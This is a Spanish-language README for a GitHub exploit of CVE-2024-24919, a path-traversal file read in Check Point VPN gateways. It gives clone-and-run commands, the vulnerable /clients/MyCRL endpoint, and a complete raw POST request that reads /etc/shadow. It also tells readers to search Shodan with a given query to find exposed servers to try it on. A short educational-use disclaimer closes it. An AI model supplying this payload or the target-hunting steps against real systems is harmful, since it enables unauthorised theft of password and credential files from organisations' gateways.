
CVE-2024-24919 Exploit and PoC - LFI Crítica para VPN de Acceso Remoto o Acceso Móvil
Este repositorio contiene un exploit en Python para el CVE-2024-24919, una vulnerabilidad que permite leer archivos sensibles de la página vulnerable.
Este exploit primero verifica si el objetivo es vulnerable, y luego obtiene la ruta que especifiques.
Severidad: Crítica
Primero clona el repositorio:
git clone https://github.com/Rug4lo/CVE-2024-24919-Exploit
cd CVE-2024-24919-Exploit
Da permisos y ejecuta el exploit con python3
chmod +x exploit.py
python3 exploit.py
Luego sigue los pasos y obtendrás los datos del archivo que especifiques
Si tienes problemas, asegúrate de que la URL que especifiques sea la principal
✓ https://google.com
✘ https://google.com/search?client=firefox
Primero debemos asegurarnos de que el sitio web tenga Check Point Security Gateways con acceso remoto VPN o software de acceso móvil habilitado.
En este exploit apuntamos al endpoint {ip}/clients/MyCRL.
Este endpoint es vulnerable si hacemos una petición POST, agregamos la cadena CSHELL/ y la ruta del archivo que queremos leer usando un Path Traversal.
La solicitud será algo como esto:
POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39
aCSHELL/../../../../../../../etc/shadow
Obtenemos todo esto mirando el código fuente
Para más información sobre el proceso, revisa este post --> https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
Si quieres probar esta vulnerabilidad puedes usar Sodan para encontrar algunos sitios web vulnerables, usando esta consulta en sodan
Server: “Check Point SVN Foundation”
https://nvd.nist.gov/vuln/detail/CVE-2024-24919 https://www.cronup.com/cve-2024-24919-zeroday-critico-explotado-activamente-en-vpns-check-point/ https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-24919
Este script es solo con fines educativos. Úsalo de manera responsable y solo en sistemas para los que tengas permiso de acceso.